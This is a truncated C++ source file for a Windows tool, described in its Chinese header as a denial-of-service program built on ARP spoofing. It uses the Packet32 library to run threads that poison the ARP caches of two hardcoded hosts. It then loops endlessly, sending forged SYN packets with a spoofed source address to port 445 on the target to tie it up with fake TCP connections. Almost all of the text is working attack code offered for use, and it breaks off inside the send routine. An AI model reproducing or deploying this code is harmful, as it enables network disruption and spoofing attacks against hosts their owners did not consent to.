cpp1.cpp

基于ARP欺骗的TCP伪连接D.o.S 本程序是一个基于ARP欺骗上面的DOS工具

// DoS_By_ARPCheat.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include "winsock2.h"
#include "Packet32.h"
#include "stdio.h"

#pragma comment(lib, "packet")
#pragma comment(lib, "ws2_32")

//下面几个宏是测试用的主机的IP和MAC
#define SIMULATE_MAC "0011111d735a"     //伪装主机的MAC地址
#define TARGET_MAC "001111c6f7fe"       //目的主机的MAC地址
#define LOCAL_MAC "00e06e41508f"        //本机MAC地址
#define TARGET_IP "211.83.97.24"        //目的主机的IP
#define SIMULATE_IP "211.83.97.16"      //伪装主机的IP

#define NDIS_PACKET_TYPE_DIRECTED 0x0001 //直接模式

#pragma pack(push, 1)

struct ET_HEADER    //以太网头部
{
    unsigned char   eh_dst[6];  
    unsigned char   eh_src[6];
    unsigned short  eh_type;
};

struct ARP_HEADER   //ARP头部
{
    unsigned short  arp_hdr;
    unsigned short  arp_pro;
    unsigned char   arp_hln;
    unsigned char   arp_pln;
    unsigned short  arp_opt;
    unsigned char   arp_sha[6];
    unsigned long   arp_spa;
    unsigned char   arp_tha[6];
    unsigned long   arp_tpa;
};

struct IP_HEADER          //IP头部
{
    char m_ver_hlen;      //4位版本号,4位ip头部长
    char m_tos;
    USHORT m_tlen;
    USHORT m_ident;
    USHORT m_flag_frag;     //3位标志位(1位未用位,1位DF,1位MF),13位片断偏移量
    char m_ttl;
    char m_protocol;
    USHORT m_cksum;
    ULONG m_sIP;
    ULONG m_dIP;
};

struct TCP_HEADER          //TCP头部
{
    USHORT m_sport;
    USHORT m_dport;
    ULONG m_seq;
    ULONG m_ack;   
    char m_hlen_res4;              //4位tcp头部长,6位保留的前4位
    char m_res2_flag;              //6位保留的后2位,6位标志
    USHORT m_win;
    USHORT m_cksum;
    USHORT m_urp;
};

struct PSD_HEADER         //伪头部，计算校验和用
{
    ULONG m_saddr; //源地址 
    ULONG m_daddr; //目的地址 
    char m_mbz; 
    char m_ptcl; //协议类型 
    USHORT m_tcpl; //TCP长度 
};

struct TCP_OPTION         //TCP选项，发起伪连接时要用来与对方协商
{
    USHORT unKnown;
    USHORT maxSegSize;     //MSS,以太网一般为1460
    char no1;
    char no2;
    USHORT SACK;
};

struct CHEAT_ARP_INFO        //ARP欺骗线程的参数
{
    char simulateIP[20];
    char targetIP[20];
    char targetMAC[13];
};

#pragma pack(pop)

USHORT CheckSum(USHORT *buffer, int size);   //计算校验和的函数
void StrToMac(char *str,char *mac);          //字符串转换为MAC地址
void ListenACK();                            //监听函数,监听对方的回包
void AssayAndSendData(LPPACKET lpPacket);    //分析数据帧并发送回包
DWORD WINAPI ArpCheat(void *pInfo);          //ARP欺骗线程
DWORD WINAPI SendSyn(void *no);              //发送SYN包的线程
void Info();                               

LPADAPTER lpAdapter=NULL;                    //适配器指针
USHORT ipID=1638;                            //IP标识
USHORT sourcePort=1056;                      //起始源端口
USHORT targetPort=445;                       //目的端口

int main(int argc, char* argv[])
{
    Info();

    WSADATA wsaData;
    if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
    {
        printf("WSAStartup error!\n");
        return -1;
    }

    //打开适配器：
    WCHAR adapter_name[2048]={0};
    ULONG adapter_length=1024;
    
    //取得所有适配器的名字.
    if(PacketGetAdapterNames((char*)adapter_name, &adapter_length)==FALSE)
    {
        //adapter_name:一个用于存放适配器的名字的缓冲区
        //adapter_length:这个缓冲区的大小
        printf("PacketGetAdapterNames error:%d\n",GetLastError());
        return -1;
    }
    
    WCHAR *name1,*name2;
    ULONG i;
    static CHAR adapter_list[10][1024];

    name1=adapter_name;
    name2=adapter_name;
    i=0;
    //把adapter_name中的适配器名字，分别copy到adapter_list[]中，i从0开始为第一个
    while((*name1!='\0') || (*(name1-1)!='\0'))
    {
        if(*name1=='\0')
        {
            memcpy(adapter_list[i],name2,2*(name1-name2));
            name2=name1+1;
            i++;
        }
        name1++;
    }

    //默认打开第一块适配器
    lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)adapter_list[0]);    
    if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
    {
        printf("Unable to open the driver, Error Code : %lx\n", GetLastError());
        return -1;
    }

    //创建ARP欺骗线程:
    CHEAT_ARP_INFO info1={0},info2={0};
    memcpy(info1.simulateIP,SIMULATE_IP,strlen(SIMULATE_IP));
    memcpy(info1.targetIP,TARGET_IP,strlen(TARGET_IP));
    memcpy(info1.targetMAC,TARGET_MAC,strlen(TARGET_MAC));
    ::CreateThread(NULL,0,ArpCheat,&info1,0,NULL);

    memcpy(info2.simulateIP,TARGET_IP,strlen(TARGET_IP));
    memcpy(info2.targetIP,SIMULATE_IP,strlen(SIMULATE_IP));
    memcpy(info2.targetMAC,SIMULATE_MAC,strlen(SIMULATE_MAC));
    ::CreateThread(NULL,0,ArpCheat,&info2,0,NULL);
    Sleep(50);

    //发送TCP伪连接的SYN数据帧：
    ::CreateThread(NULL,0,SendSyn,NULL,0,NULL);

    ListenACK();      //循环监听数据包
    PacketCloseAdapter(lpAdapter);  //关闭适配器
    ::WSACleanup();
    return 0;
}

DWORD WINAPI SendSyn(void *no)
{
    Sleep(100);

    while(TRUE)     //循环发送SYN包发起伪连接
    {
        char s_mac[6]={0},d_mac[6]={0};
        char sendSynBuf[128]={0};
        ET_HEADER et_header={0};
        IP_HEADER ip_header={0};
        TCP_HEADER tcp_header={0};
        TCP_OPTION tcp_option={0};
        PSD_HEADER psd_header={0};

        //填充以太头部：
        StrToMac(LOCAL_MAC,s_mac);    //local_mac
        memcpy(et_header.eh_src,s_mac,6);
        StrToMac(TARGET_MAC,d_mac);    //dest_mac
        memcpy(et_header.eh_dst,d_mac,6);
        et_header.eh_type=htons(0x0800);  //类型为0x0800表示这是IP包

        //填充IP头部：
        ip_header.m_ver_hlen=(4<<4|5);
        ip_header.m_tos=0;
        ip_header.m_tlen=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));
        ip_header.m_ident=htons(ipID++);
        ip_header.m_flag_frag=htons(16384); //设置为不分片
        ip_header.m_ttl=128;
        ip_header.m_protocol=IPPROTO_TCP;   //高层协议为TCP
        ip_header.m_cksum=0;
        ip_header.m_sIP=inet_addr(SIMULATE_IP);   //源IP填为伪装主机的IP
        ip_header.m_dIP=inet_addr(TARGET_IP);     //目的IP

        ip_header.m_cksum=CheckSum((USHORT *)&ip_header,sizeof(IP_HEADER));

        //填充TCP头部以及TCP选项：
        tcp_header.m_dport=htons(targetPort);
        tcp_header.m_sport=htons(sourcePort++);
        tcp_header.m_seq=::GetTickCount();   //初始化序列号
        tcp_header.m_ack=0;
        tcp_header.m_hlen_res4=(((sizeof(TCP_HEADER)+sizeof(TCP_OPTION))/4)<<4);
        tcp_header.m_res2_flag=2;      //标识为SYN包
        tcp_header.m_win=htons(16384);
        tcp_header.m_cksum=0;
        tcp_header.m_urp=0;

        tcp_option.unKnown=htons(516);
        tcp_option.maxSegSize=htons(1460);   //MSS，以太网一般为1460
        tcp_option.no1=1;
        tcp_option.no2=1;
        tcp_option.SACK=htons(1026);

        //计算TCP校验和：
        psd_header.m_daddr=ip_header.m_dIP;
        psd_header.m_saddr=ip_header.m_sIP;
        psd_header.m_mbz=0;
        psd_header.m_ptcl=IPPROTO_TCP;
        psd_header.m_tcpl=htons(sizeof(TCP_HEADER)+sizeof(TCP_OPTION));

        char tcpBuf[128]={0};
        memcpy(tcpBuf,&psd_header,sizeof(PSD_HEADER));
        memcpy(tcpBuf+sizeof(PSD_HEADER),&tcp_header,sizeof(TCP_HEADER));
        memcpy(tcpBuf+sizeof(PSD_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));
        tcp_header.m_cksum=CheckSum((USHORT *)tcpBuf,sizeof(PSD_HEADER)+sizeof(TCP_HEADER)+sizeof(TCP_OPTION));

        //构造SYN数据帧：
        memcpy(sendSynBuf,&et_header,sizeof(ET_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER),&ip_header,sizeof(IP_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER),&tcp_header,sizeof(TCP_HEADER));
        memcpy(sendSynBuf+sizeof(ET_HEADER)+sizeof(IP_HEADER)+sizeof(TCP_HEADER),&tcp_option,sizeof(TCP_OPTION));

        //发送伪造的SYN包：
        LPPACKET lpPacket;
        lpPacket=PacketAllocatePacket();     //给PACKET结构指针分配内存
        PacketInitPacket(lpPacket,sendSynBuf,128);   //初始化PACKET结构指针

        if(PacketSetNumWrites(lpAdapter,1)==FALSE)   //设置发送次数
        {
            printf("Warning: Unable to send more than one packet in a single write!\n");
            continue;
        }

        if(PacketSendPacket(lpAdapter,lpPacket,TRUE)==FALSE)  
        {